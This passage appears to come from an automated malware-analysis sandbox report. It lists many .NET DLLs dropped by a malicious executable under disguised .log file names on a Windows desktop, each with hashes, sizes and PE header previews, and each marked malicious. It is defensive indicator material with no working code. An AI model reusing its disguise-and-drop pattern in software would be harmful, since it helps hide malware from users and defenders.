File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34816
Entropy (8bit):	5.636032516496583
Encrypted:	false
SSDEEP:	384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
MD5:	996BD447A16F0A20F238A611484AFE86
SHA1:	CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
SHA-256:	0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
SHA-512:	80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\iGWxVWoq.log

Download File

Process:	C:\Users\user\Desktop\vb8DOBZQ4X.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.660491370279985
Encrypted:	false
SSDEEP:	768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
MD5:	240E98D38E0B679F055470167D247022
SHA1:	49888CCED719AE78EE3BAE2959402749668AA1C6
SHA-256:	C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
SHA-512:	93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-\|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\iNKhTOoj.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	6.057993947082715
Encrypted:	false
SSDEEP:	3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
MD5:	16B480082780CC1D8C23FB05468F64E7
SHA1:	6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
SHA-256:	7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
SHA-512:	A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

C:\Users\user\Desktop\iPKZlQUF.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	64000
Entropy (8bit):	5.857602289000348
Encrypted:	false
SSDEEP:	768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
MD5:	5EE7E079F998F80293B3467CE6A5B4AE
SHA1:	3C0932D48F3542E9DFB09AD9E1FF70891A038532
SHA-256:	A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
SHA-512:	056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........\|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\iTpzukdJ.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\ihTQsugx.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	6.057993947082715
Encrypted:	false
SSDEEP:	3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
MD5:	16B480082780CC1D8C23FB05468F64E7
SHA1:	6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
SHA-256:	7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
SHA-512:	A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

C:\Users\user\Desktop\imWxxkPR.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\itiylxdQ.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\jDxFqWCl.log

Download File

Process:	C:\Users\user\Desktop\vb8DOBZQ4X.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	294912
Entropy (8bit):	6.010605469502259
Encrypted:	false
SSDEEP:	6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
MD5:	00574FB20124EAFD40DC945EC86CA59C
SHA1:	8B96C4B6F450E711085AE7B22517C195222ACFDF
SHA-256:	3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
SHA-512:	B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Users\user\Desktop\jFYrMCHr.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\jZepcAzi.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33280
Entropy (8bit):	5.634433516692816
Encrypted:	false
SSDEEP:	384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
MD5:	0D323E1CACEA89CAA5DDEAF2F37BCA69
SHA1:	4769C3E947D02A1FD548BE64013F520D571D96E1
SHA-256:	873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
SHA-512:	73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................\|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\jhXaeGlG.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	70144
Entropy (8bit):	5.909536568846014
Encrypted:	false
SSDEEP:	1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
MD5:	E4FA63649F1DBD23DE91861BB39C317D
SHA1:	25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
SHA-256:	CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
SHA-512:	C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\juaFGjjo.log

Download File

Process:	C:\Users\user\Desktop\vb8DOBZQ4X.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\kAqpsefy.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38912
Entropy (8bit):	5.679286635687991
Encrypted:	false
SSDEEP:	768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
MD5:	9E910782CA3E88B3F87826609A21A54E
SHA1:	8DBC333244620EDA5D3F1C9EAA6B924455262303
SHA-256:	3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
SHA-512:	592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\kdLAuCIK.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\keuZOuus.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\kgEiDTmg.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	41472
Entropy (8bit):	5.6808219961645605
Encrypted:	false
SSDEEP:	768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
MD5:	6CD78D07F9BD4FECC55CDB392BC5EC89
SHA1:	094DE32070BED60A811D983740509054AD017CE4
SHA-256:	16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
SHA-512:	5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\ktNSFLQh.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33280
Entropy (8bit):	5.634433516692816
Encrypted:	false
SSDEEP:	384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
MD5:	0D323E1CACEA89CAA5DDEAF2F37BCA69
SHA1:	4769C3E947D02A1FD548BE64013F520D571D96E1
SHA-256:	873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
SHA-512:	73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................\|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\kzHRZmsQ.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.660491370279985
Encrypted:	false
SSDEEP:	768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
MD5:	240E98D38E0B679F055470167D247022
SHA1:	49888CCED719AE78EE3BAE2959402749668AA1C6
SHA-256:	C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
SHA-512:	93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-\|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\lSDqlTwz.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	342528
Entropy (8bit):	6.170134230759619
Encrypted:	false
SSDEEP:	3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
MD5:	9DADB5C8A6FD5020275C31EE6BC61D63
SHA1:	ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
SHA-256:	80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
SHA-512:	EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\lStYNxlh.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\lbnIQCXF.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	50176
Entropy (8bit):	5.723168999026349
Encrypted:	false
SSDEEP:	768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
MD5:	2E116FC64103D0F0CF47890FD571561E
SHA1:	3EF08A9B057D1876C24FC76E937CDA461FAC6071
SHA-256:	25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
SHA-512:	39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\lflgjgBQ.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38400
Entropy (8bit):	5.699005826018714
Encrypted:	false
SSDEEP:	768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
MD5:	87765D141228784AE91334BAE25AD743
SHA1:	442BA48B1B5BB158E2E6145B0592F81D20CB9C57
SHA-256:	9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
